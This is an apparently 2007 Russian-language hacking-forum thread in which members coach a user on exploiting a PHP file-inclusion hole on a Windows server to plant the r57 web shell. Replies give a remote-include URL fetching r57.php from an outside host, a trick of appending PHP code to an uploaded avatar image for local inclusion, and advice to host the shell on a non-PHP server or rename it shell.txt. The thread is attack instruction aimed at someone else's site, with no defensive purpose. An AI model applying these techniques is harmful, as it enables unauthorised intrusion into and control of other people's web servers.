Несколько моментов про инклюды

Discussion in 'Уязвимости' started by Dark_G, 12 Feb 2007.

  1. Dark_G

    Dark_G New Member

    Joined:
    11 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Нашел на сервере скрипт, позволяющий просматривать любые файлы на сервере и инклудить php скрипты. Попытался инклудить r57 шелл с сайта на fatal.ru, но почему-то не получилось. На сервере стоит Windows 2003 server. Не подскажете что можно в данном случае сделать?
     
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    значит плохо пытался, пытайся лучше, р57 ничем не хуже других пхп, и вообще если у тя не получаеца залить, с чего ты взял что вообще можно пхп инк делать?
     
    1 person likes this.
  3. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Ну если позволяет инклудить это очень хорошо. Кстати, не приходило в голову что инклуд может быть локальным, позтому конструкция http://site.ru/file=http://othersite.ru/r57.php не работает. Залей php шелл на тот сервис, можт там есть форум или можно подгружать файлы.
     
  4. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    Constantine дело говорит, просто иногда перед тем как инклудить скрипт или файл, сначала проверяют его существование, поэтому инклудить можно только локально... если есть на сайте форум и можно грузить аватары с компа, то берёшь картинку открываешь в блокноте и в конец добавляешь пхп код, грузишь и инклудишь - вуаля. правда не везде покатит, но как вариант
     
  5. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    Так, а мне вот интересно, мой шелл нафига трогать и палить, а?
     
  6. Dark_G

    Dark_G New Member

    Joined:
    11 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Меня больше другое волнует. Когда, я допустим, инклудю пхпшник, в котором, к примеру выполняется только phpinfo(), он мне выдает результат не от того сайта, который я пытаюсь взломать, а от того, на котором залит пхпшник. Почему же он все таки выполняется на втором сайте а не на аттакуемом?
     
  7. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    Ну это фиг знает, значит это не инклуд, либо ты что-то перепутал...
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    2 Dark_G
    видимо это не инклуд, а просто редирект на другую страничку. Такая фигня на вэб каталогах есть
     
  9. Dark_G

    Dark_G New Member

    Joined:
    11 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Если редирект, то только из фрейма. Но все равно с этого ведь можно что-то поиметь! Просмотр файлов, как никак.
     
  10. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    не догадываешь почему? :D это потому что тот хост, где у тебя пхп скрипт, поддерживает пхп скрипты.А ты инклудишь его :D лол..надо хостинг, который не поддерживает пхп
     
    2 people like this.
  11. VDShark

    VDShark Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    260
    Likes Received:
    158
    Reputations:
    62
    Да)))) Бывает и такое, инклудить пытаются, а он еще на твоем серваке выполняется) Возьми сервак без поддержки пхп )
     
    1 person likes this.
  12. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    narod.ru )))))
     
  13. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Ага, я вот тоже так думаю, что хостинг должен быть без php.
    Если не трудно, дай ссылку!
     
  14. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    Извращенцы вы все.
    просто переименовать в shell.txt не проше?
    инклуду как-то пофиг на расширение, а серверу нет.
     
  15. VDShark

    VDShark Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    260
    Likes Received:
    158
    Reputations:
    62
    =) Ну нужно же погонять человека, пусть знает где хостинги брать) А до переименования и сам мог бы додуматься, это вытекает из всего вышесказанного=/